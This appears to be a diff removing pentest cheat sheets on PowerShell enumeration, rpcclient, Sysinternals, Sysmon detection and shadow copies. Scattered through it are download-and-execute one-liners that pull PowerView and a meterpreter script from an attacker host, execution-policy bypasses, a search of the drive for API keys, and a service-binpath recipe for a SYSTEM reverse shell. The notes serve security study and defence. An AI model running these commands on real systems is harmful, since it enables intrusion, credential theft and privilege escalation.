```
|
|
||||||
Get-Help Command-Name
|
|
||||||
```
|
|
||||||
* Show examples
|
|
||||||
```
|
|
||||||
Get-Help Command-Name -Examples
|
|
||||||
```
|
|
||||||
|
|
||||||
* Get-Command gets all the cmdlets installed on the current Computer.
|
|
||||||
```
|
|
||||||
Get-Command
|
|
||||||
```
|
|
||||||
```
|
|
||||||
Get-Command Verb-*
|
|
||||||
Get-Command Invoke-*
|
|
||||||
Get-Command Get-*
|
|
||||||
```
|
|
||||||
|
|
||||||
## Passing Output via Pipe
|
|
||||||
* A pipe passes object including methods and attributes.
|
|
||||||
|
|
||||||
```
|
|
||||||
Verb-Noun | Get-Member
|
|
||||||
```
|
|
||||||
```
|
|
||||||
Get-Command | Get-Member -MemberType Method
|
|
||||||
```
|
|
||||||
|
|
||||||
## Creating Objects from Previous Cmdlets
|
|
||||||
```
|
|
||||||
Get-ChildItem | Select-Object -Property Mode, Name
|
|
||||||
```
|
|
||||||
* first - gets the first x object
|
|
||||||
* last - gets the last x object
|
|
||||||
* unique - shows the unique objects
|
|
||||||
* skip - skips x objects
|
|
||||||
|
|
||||||
## Filtering Objects
|
|
||||||
```
|
|
||||||
Verb-Noun | Where-Object -Property PropertyName -operator Value
|
|
||||||
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
|
|
||||||
```
|
|
||||||
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
|
|
||||||
* Where -operator is a list of the following operators:
|
|
||||||
|
|
||||||
* -Contains: if any item in the property value is an exact match for the specified value
|
|
||||||
* -EQ: if the property value is the same as the specified value
|
|
||||||
* -GT: if the property value is greater than the specified value
|
|
||||||
|
|
||||||
## Sort Object
|
|
||||||
```
|
|
||||||
Verb-Noun | Sort-Object
|
|
||||||
```
|
|
||||||
```
|
|
||||||
Get-ChildItem | Sort-Object
|
|
||||||
```
|
|
||||||
|
|
||||||
## Finding a File
|
|
||||||
```
|
|
||||||
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
Get-HotFix | Format-list | findstr <searchstring>
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
|
|
||||||
```
|
|
||||||
* Find backup files
|
|
||||||
```sh
|
|
||||||
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
|
|
||||||
```
|
|
||||||
* Find file contents
|
|
||||||
```sh
|
|
||||||
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
|
|
||||||
```
|
|
||||||
|
|
||||||
## Showing File Content
|
|
||||||
```
|
|
||||||
Get-Content 'C:\Program Files\interesting-file.txt'
|
|
||||||
```
|
|
||||||
* Indexing lines
|
|
||||||
```sh
|
|
||||||
(Get-Content -Path file.txt)[index]
|
|
||||||
```
|
|
||||||
* Search
|
|
||||||
```sh
|
|
||||||
Select-String <filename> -Pattern <pattern>
|
|
||||||
```
|
|
||||||
|
|
||||||
## Copy File Content
|
|
||||||
```sh
|
|
||||||
Copy-Item <sourcefile> <destfile>
|
|
||||||
```
|
|
||||||
|
|
||||||
## Count Lines of Output
|
|
||||||
As an example, count all cmdlets on the system
|
|
||||||
```
|
|
||||||
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
|
|
||||||
```
|
|
||||||
|
|
||||||
## Count Words
|
|
||||||
```
|
|
||||||
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
|
|
||||||
```
|
|
||||||
|
|
||||||
## Checksum of File
|
|
||||||
```
|
|
||||||
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
|
|
||||||
```
|
|
||||||
|
|
||||||
## Current Working Directory
|
|
||||||
```
|
|
||||||
Get-Location
|
|
||||||
```
|
|
||||||
|
|
||||||
## File Metadata
|
|
||||||
```sh
|
|
||||||
ls | Format-List *
|
|
||||||
```
|
|
||||||
|
|
||||||
## Web Request
|
|
||||||
```sh
|
|
||||||
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
|
|
||||||
```
|
|
||||||
|
|
||||||
* Webrequest and execute in one go
|
|
||||||
```sh
|
|
||||||
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
|
|
||||||
```
|
|
||||||
|
|
||||||
## Base64 Decode File
|
|
||||||
```
|
|
||||||
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
|
|
||||||
```
|
|
||||||
|
|
||||||
## **Circumvent Execution-Policy**
|
|
||||||
```sh
|
|
||||||
powershell -ExecutionPolicy Bypass -File .\<file>
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
Set-ExecutionPolicy Bypass -Scope Process
|
|
||||||
```
|
|
||||||
|
|
||||||
## Enumeration
|
|
||||||
|
|
||||||
### Users
|
|
||||||
```
|
|
||||||
Get-LocalUser
|
|
||||||
```
|
|
||||||
|
|
||||||
* Password not required users
|
|
||||||
```
|
|
||||||
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
|
|
||||||
```
|
|
||||||
|
|
||||||
* SID of users
|
|
||||||
```
|
|
||||||
Get-WmiObject win32_useraccount | Select name, sid
|
|
||||||
```
|
|
||||||
|
|
||||||
### Network intel
|
|
||||||
* Connections
|
|
||||||
```sh
|
|
||||||
netstat -ano
|
|
||||||
```
|
|
||||||
* IP Address
|
|
||||||
```
|
|
||||||
Get-NetIpAddress
|
|
||||||
```
|
|
||||||
|
|
||||||
* Listening TCP Ports
|
|
||||||
```
|
|
||||||
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
|
|
||||||
```
|
|
||||||
|
|
||||||
* TCP Port by number
|
|
||||||
```
|
|
||||||
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
|
|
||||||
```
|
|
||||||
|
|
||||||
### Patch level and updates
|
|
||||||
```
|
|
||||||
Get-Hotfix
|
|
||||||
```
|
|
||||||
* Find patch by HotFixID
|
|
||||||
```
|
|
||||||
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
wmic qfe get Caption,Description,HotFixID,InstalledOn
|
|
||||||
```
|
|
||||||
|
|
||||||
### Drivers
|
|
||||||
```sh
|
|
||||||
driverquery
|
|
||||||
```
|
|
||||||
|
|
||||||
### Processes
|
|
||||||
* Start processes
|
|
||||||
```sh
|
|
||||||
Start-Process <process>
|
|
||||||
```
|
|
||||||
|
|
||||||
* Running processes
|
|
||||||
```sh
|
|
||||||
Get-Process <process>
|
|
||||||
```
|
|
||||||
### Scheduled tasks
|
|
||||||
```sh
|
|
||||||
schtasks /query /fo LIST /v
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
Get-ScheduledTaskInfo
|
|
||||||
```
|
|
||||||
* Scheduled Tasks, by TaskName
|
|
||||||
```
|
|
||||||
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
|
|
||||||
```
|
|
||||||
or
|
|
||||||
```
|
|
||||||
Get-ScheduledTask -TaskName taskname
|
|
||||||
```
|
|
||||||
|
|
||||||
### Alternate Data Stream(ADS)
|
|
||||||
* Show ADS
|
|
||||||
```sh
|
|
||||||
Get-Item -Path file.exe -Stream *
|
|
||||||
```
|
|
||||||
* Open ADS
|
|
||||||
```sh
|
|
||||||
wmic process call create $(Resolve-Path file.exe:streamname)
|
|
||||||
```
|
|
||||||
|
|
||||||
### Export Output
|
|
||||||
* Export as CSV
|
|
||||||
```sh
|
|
||||||
Get-Process <process> | Export-Csv <output.csv>
|
|
||||||
```
|
|
||||||
|
|
||||||
### ACL
|
|
||||||
* Owner of files
|
|
||||||
```
|
|
||||||
Get-ACL C:\
|
|
||||||
```
|
|
||||||
|
|
||||||
### Port Scanner
|
|
||||||
```
|
|
||||||
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
|
|
||||||
```
|
|
||||||
|
|
||||||
### Ping Hosts
|
|
||||||
```sh
|
|
||||||
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
|
|
||||||
```
|
|
||||||
|
|
||||||
### Antivirus
|
|
||||||
```sh
|
|
||||||
sc query windefend
|
|
||||||
```
|
|
||||||
* Service name unknown
|
|
||||||
```sh
|
|
||||||
sc queryex type=service
|
|
||||||
```
|
|
||||||
|
|
||||||
### Using Powerview
|
|
||||||
```sh
|
|
||||||
Import-Module .\powerview.ps1
|
|
||||||
Get-NetDomainController
|
|
||||||
(Get-NetUser).name
|
|
||||||
Get-NetUser -properties description
|
|
||||||
Get-NetUser | select -ExpandProperty lastlogon
|
|
||||||
Get-NetComputer -ping
|
|
||||||
Get-NetGroupMember "Domain Admins"
|
|
||||||
Find-DomainShare -CheckShareAccess
|
|
||||||
```
|
|
||||||
* Enumerate Group Policy
|
|
||||||
```sh
|
|
||||||
Get-NetGPO
|
|
||||||
```
|
|
||||||
* Trust relationship to other domains
|
|
||||||
```sh
|
|
||||||
Get-NetDomainTrust
|
|
||||||
```
|
|
||||||
* User enumeration
|
|
||||||
```sh
|
|
||||||
Find-LocalAdminAccess
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
whoami /priv
|
|
||||||
```
|
|
||||||
|
|
||||||
```
|
|
||||||
Import-Module ActiveDirectory
|
|
||||||
Get-ADGroup
|
|
||||||
Get-ADGroupMember
|
|
||||||
Get-ADPrincipalGroupMembership
|
|
||||||
```
|
|
|
@ -1,10 +0,0 @@
|
||||||
# RPCclient
|
|
||||||
|
|
||||||
* Enumerate users and groups
|
|
||||||
|
|
||||||
```sh
|
|
||||||
rpcclient <domain> <users>
|
|
||||||
rpcclient $> enumdomusers
|
|
||||||
...
|
|
||||||
rpcclient $> enumdomgroups
|
|
||||||
```
|
|
|
@ -1,125 +0,0 @@
|
||||||
# Sysinternals and CLI usage
|
|
||||||
|
|
||||||
## Opening System Properties
|
|
||||||
```
|
|
||||||
sysdm.cpl
|
|
||||||
```
|
|
||||||
|
|
||||||
## Installing webdav server,
|
|
||||||
|
|
||||||
* Starting windows webclient service
|
|
||||||
```
|
|
||||||
get-service webclient
|
|
||||||
start-service webclient
|
|
||||||
```
|
|
||||||
|
|
||||||
* Opening NetworkAndSharingCenter
|
|
||||||
```
|
|
||||||
control.exe /name Microsoft.NetworkAndSharingCenter
|
|
||||||
```
|
|
||||||
## Make sure Network Discovery is enabled, advanced settings!
|
|
||||||
|
|
||||||
```
|
|
||||||
Install-WindowsFeature WebDAV-Redirector –Restart
|
|
||||||
Get-WindowsFeature WebDAV-Redirector | Format-Table –Autosize
|
|
||||||
```
|
|
||||||
|
|
||||||
## Sigcheck
|
|
||||||
Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a file’s status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.
|
|
||||||
|
|
||||||
* Check for unsigned files in `C:\Windows\system32`
|
|
||||||
```
|
|
||||||
sigcheck -u -e C:\Windows\System32
|
|
||||||
```
|
|
||||||
* `-u` "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files."
|
|
||||||
* `-e` "Scan executable images only (regardless of their extension)"
|
|
||||||
|
|
||||||
## Alternate Data Stream (ADS)
|
|
||||||
By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition)
|
|
||||||
```
|
|
||||||
streams file.txt
|
|
||||||
|
|
||||||
notepad file.txt:<datastream_name>
|
|
||||||
or
|
|
||||||
Get-Content -Path .\file.txt -stream ads.txt
|
|
||||||
```
|
|
||||||
|
|
||||||
## SDelete
|
|
||||||
SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.
|
|
||||||
|
|
||||||
|
|
||||||
## TCPView
|
|
||||||
TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.
|
|
||||||
|
|
||||||
```
|
|
||||||
tcpview
|
|
||||||
tcpvcon
|
|
||||||
```
|
|
||||||
|
|
||||||
## Autoruns
|
|
||||||
Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more.
|
|
||||||
|
|
||||||
## Procdump
|
|
||||||
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.
|
|
||||||
|
|
||||||
|
|
||||||
## Procdump
|
|
||||||
The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.
|
|
||||||
|
|
||||||
## Procmon
|
|
||||||
Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.
|
|
||||||
|
|
||||||
## Psexec
|
|
||||||
PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems
|
|
||||||
|
|
||||||
|
|
||||||
## Winobj
|
|
||||||
WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space.
|
|
||||||
|
|
||||||
## BGInfo
|
|
||||||
It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more
|
|
||||||
|
|
||||||
## RegJump
|
|
||||||
This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM).
|
|
||||||
|
|
||||||
```
|
|
||||||
regjump HKLM
|
|
||||||
```
|
|
||||||
* Similar to
|
|
||||||
```
|
|
||||||
reg query HKLM
|
|
||||||
```
|
|
||||||
```
|
|
||||||
Get-Item
|
|
||||||
Get-ItemProperty
|
|
||||||
```
|
|
||||||
|
|
||||||
## Strings
|
|
||||||
Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.
|
|
||||||
|
|
||||||
## Create a system authority shell
|
|
||||||
1. Check permissons
|
|
||||||
```sh
|
|
||||||
accesschk.exe /accepteula -uwcqv user <serviceName>
|
|
||||||
```
|
|
||||||
2. Query service
|
|
||||||
```sh
|
|
||||||
sq qc <service>
|
|
||||||
```
|
|
||||||
3. Set service config to the msfvenom reverse shell, uploaded previously.
|
|
||||||
```
|
|
||||||
sc config daclsvc binpath= "\"C:\shell.exe""
|
|
||||||
```
|
|
||||||
4. Start service and gain high priv shell
|
|
||||||
```sh
|
|
||||||
net start daclsvc
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Tips & Tricks
|
|
||||||
|
|
||||||
* [Sysinternal tools can be used without installing](https://live.sysinternals.com/)
|
|
||||||
* Execute through explorer via
|
|
||||||
```sh
|
|
||||||
\\live.sysinternals.com\tools
|
|
||||||
```
|
|
|
@ -1,72 +0,0 @@
|
||||||
# Sysmon
|
|
||||||
|
|
||||||
Sysmon gathers detailed and high-quality logs as well as event tracing that assists in identifying anomalies in your environment. Sysmon is most commonly used in conjunction with security information and event management (SIEM) system or other log parsing solutions that aggregate, filter, and visualize events.
|
|
||||||
|
|
||||||
## Paths
|
|
||||||
|
|
||||||
* Logfiles
|
|
||||||
```
|
|
||||||
Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
|
|
||||||
```
|
|
||||||
|
|
||||||
## Configuration
|
|
||||||
|
|
||||||
* [SwiftOnSecurity](https://github.com/SwiftOnSecurity/sysmon-config)
|
|
||||||
* [ION-Storm](https://github.com/ion-storm/sysmon-config/blob/develop/sysmonconfig-export.xml)
|
|
||||||
|
|
||||||
## Installation
|
|
||||||
|
|
||||||
```sh
|
|
||||||
Downloads-SysInternalsTools C:\Sysinternals
|
|
||||||
```
|
|
||||||
|
|
||||||
## Best Practices
|
|
||||||
|
|
||||||
* Exclude, not include events
|
|
||||||
* CLI gives further control over filters
|
|
||||||
```sh
|
|
||||||
Get-WinEvent
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
wevutil.exe
|
|
||||||
```
|
|
||||||
* Know the env before implementation
|
|
||||||
|
|
||||||
## Filtering Events
|
|
||||||
|
|
||||||
* Actions -> Filter Current Log
|
|
||||||
|
|
||||||
### Filtering Events with Powershell
|
|
||||||
|
|
||||||
* Logged Events containing port 4444
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444'
|
|
||||||
```
|
|
||||||
* Logged Events containing lsass.exe
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=10 and */EventData/Data[@Name="TargetImage"] and */EventData/Data="C:\Windows\system32\lsass.exe"'
|
|
||||||
```
|
|
||||||
* Rats and C2
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=<Port>'
|
|
||||||
```
|
|
||||||
|
|
||||||
## Evasion Techniques
|
|
||||||
|
|
||||||
* Alternate Data Streams
|
|
||||||
* Injections
|
|
||||||
* Masquerading
|
|
||||||
* Packing/Compression
|
|
||||||
* Recompiling
|
|
||||||
* Obfuscation
|
|
||||||
* Anti-Reversing Techniques
|
|
||||||
* Remote Thread (OpenThread, ResumeThread)
|
|
||||||
|
|
||||||
### Detecting Evasion Techniques with Powershell
|
|
||||||
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=15'
|
|
||||||
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=8'
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
|
@ -1,9 +0,0 @@
|
||||||
# Volume Shadow Copy Service
|
|
||||||
|
|
||||||
## Usage
|
|
||||||
```sh
|
|
||||||
vssadmin list volumes
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
vssadmin list shadows
|
|
||||||
```
|
|
Loading…
Reference in New Issue